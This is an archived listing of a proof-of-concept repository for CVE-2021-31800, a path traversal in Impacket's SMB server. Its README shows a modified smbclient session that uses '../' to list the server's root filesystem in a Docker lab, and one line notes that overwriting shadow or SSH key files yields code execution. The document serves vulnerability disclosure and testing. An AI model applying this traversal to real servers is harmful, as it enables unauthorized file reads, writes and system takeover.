CVE-2021-31800 PoC — impacket 路径遍历漏洞

Source

https://github.com/p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write

Associated Vulnerability

Title:impacket 路径遍历漏洞 (CVE-2021-31800)
Description:impacket是一个应用软件。用于处理网络协议的Python类的集合。 Impacket 0.9.22之前版本存在安全漏洞，该漏洞源于smbserver.py存在多个路径遍历漏洞。攻击者可利用该漏洞可以通过..列出并写入任意文件。目录遍历。通过替换etc shadow或SSH授权密钥来实现任意代码执行。

Description

A path traversal in smbserver.py allows an attacker to read/write arbitrary files on the server.

Readme

# CVE-2021-31800 - Impacket SMB Server Arbitrary file read/write

 - **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`
 - **CVSS Score**: 9.9 (Critical)

## Description

A path traversal in [smbserver.py](https://github.com/fortra/impacket/blob/cb6d43a677c338db930bc4e9161620832c1ec624/impacket/smbserver.py) allows an attacker to read/write arbitrary files on the server. 

Detailed explanation of this issue: [https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/](https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/)

## Usage

Start the exploit environnement by typing `make` inside [./exploit_env/](./exploit_env/). Then you can use a modified version of smbclient.py to get an arbitrary read/write of files through a path traversal.

You can then use `../` to move around the file system and read or write files! Here is an example:

```
# smbclient.py 192.168.1.27
Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# shares
IPC$
SYSVOL
# use SYSVOL
# ls 
-rw-rw-rw-         10  Sun Jan  8 23:59:59 2023 test.txt
# ls ../
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 sbin
drw-rw-rw-        360  Sun Jan  8 23:59:59 2023 dev
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 sys
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 media
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 srv
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 opt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 tmp
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 var
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 bin
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 root
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 usr
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 mnt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 run
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 boot
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 etc
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 proc
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib64
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 home
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 share
-rw-rw-rw-          0  Sun Jan  8 23:59:59 2023 .dockerenv
-rw-rw-rw-        142  Sun Jan  8 23:59:59 2023 entrypoint.sh
#
```

## Demonstration

For demonstrations, you can start the vulnerable environnement by typing `make` inside [./vulnerable_env/](./vulnerable_env/).

## References
 - https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/
 - Interesting comment: https://github.com/fortra/impacket/blob/fea485d2e4a53e9c26c02678237df1fc6621b5f4/impacket/smbserver.py#L16

File Snapshot


 [4.0K]  /data/pocs/d50fb61599e9683065824dfac84cf64015300862
├── [4.0K]  exploit_env
│   ├── [ 669]  Dockerfile
│   ├── [ 426]  Makefile
│   └── [4.0K]  patched
│       └── [ 17K]  smbclient.py
├── [2.7K]  README.md
└── [4.0K]  vulnerable_env
    ├── [ 830]  Dockerfile
    └── [ 456]  Makefile

3 directories, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!